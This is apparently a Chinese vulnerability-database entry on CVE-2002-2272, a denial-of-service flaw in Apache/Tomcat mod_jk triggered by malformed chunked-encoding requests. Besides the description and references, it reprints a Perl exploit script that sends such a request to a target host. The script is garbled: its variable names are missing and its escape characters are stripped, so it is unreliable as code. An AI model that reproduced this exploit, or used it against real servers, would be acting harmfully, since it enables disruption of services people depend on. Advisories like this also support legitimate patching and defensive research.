Apache/Tomcat Mod_JK分块编码远程拒绝服务攻击漏洞

Apache/Tomcat Mod_JK分块编码远程拒绝服务攻击漏洞

漏洞ID 1107127 漏洞类型 缓冲区溢出
发布时间 2002-12-04 更新时间 2002-12-31
图片[1]-Apache/Tomcat Mod_JK分块编码远程拒绝服务攻击漏洞-安全小百科CVE编号 CVE-2002-2272
图片[2]-Apache/Tomcat Mod_JK分块编码远程拒绝服务攻击漏洞-安全小百科CNNVD-ID CNNVD-200212-149
漏洞平台 Unix CVSS评分 7.8
|漏洞来源
https://www.exploit-db.com/exploits/22068
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-149
|漏洞详情
ApacheWebserver和Tomcat是由Apache项目组开发和维护的HTTP服务程序,可运行在Unix,Linux和Windows操作系统下。mod_jk模块设计存在问题,远程攻击者可以利用这个漏洞发送畸形请求而使ApacheWeb服务程序在Apache和Tomcat之间不能同步,导致拒绝服务攻击。Mod_jk是一款Apache模块,允许Apache透明地提交WEB请求给Tomcat引擎,支持多种协议。当这些组件组合在一起时,由mod_jk实现的通信协议存在漏洞允许恶意用户Apache-Tomcat之间通信不同步。攻击者可以连接目标机器,提交几个包含非法分块编码数据的畸形WEB请求,由于Mod_jk不正确解析分块请求,重复的请求可以导致服务程序停止对正常服务的应答。
|漏洞EXP
source: http://www.securityfocus.com/bid/6320/info

Apache Webserver and Tomcat are HTTP servers maintained and distributed by the Apache project. Apache Webserver and Tomcat are available for the Unix, Linux, and Microsoft Windows platforms.

It has been reported that a denial of service exists in Apache Webserver and Tomcat when mod_jk is used. Due to design problems in the module, a user submitting malicious requests to the Apache Webserver may cause desynchronization between Apache and Tomcat. This could be done through malicious chunked encoding requests.

#!/usr/bin/perl -w

use IO::Socket;

 = "Apache 1.3.x, Tomcat 4.x Server, mod_jk 1.2 using Apache Jserv
Protocol 1.3";

unless (@ARGV == 1) {
  print "n By Sapient2003n";
  die "usage: -bash <host to exploit>n";
}
print "n By Sapient2003n";

 = "GET / HTTP/1.0nHost: [0]nTransfer-ENcoding:
Chunkedn53636f7474";

 = IO::Socket::INET->new(
        PeerAddr => [0],
        PeerPort => 69,
        Proto    => "udp",
) or die "Can't find host [0]n";
print  ;
print "Attempted to exploit [0]n";
close();
|参考资料

来源:BID
名称:6320
链接:http://www.securityfocus.com/bid/6320
来源:BUGTRAQ
名称:20021204Apache/TomcatDenialOfServiceAndInformationLeakageVulnerability
链接:http://archives.neohapsis.com/archives/bugtraq/2002-12/0045.html
来源:XF
名称:tomcat-modjk-get-bo(10771)
链接:http://xforce.iss.net/xforce/xfdb/10771
来源:NSFOCUS
名称:3967
链接:http://www.nsfocus.net/vulndb/3967

相关推荐: svgalib zgv缓冲区溢出漏洞

svgalib zgv缓冲区溢出漏洞 漏洞ID 1105314 漏洞类型 缓冲区溢出 发布时间 1997-06-20 更新时间 1997-06-20 CVE编号 CVE-1999-1483 CNNVD-ID CNNVD-199706-011 漏洞平台 Linu…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享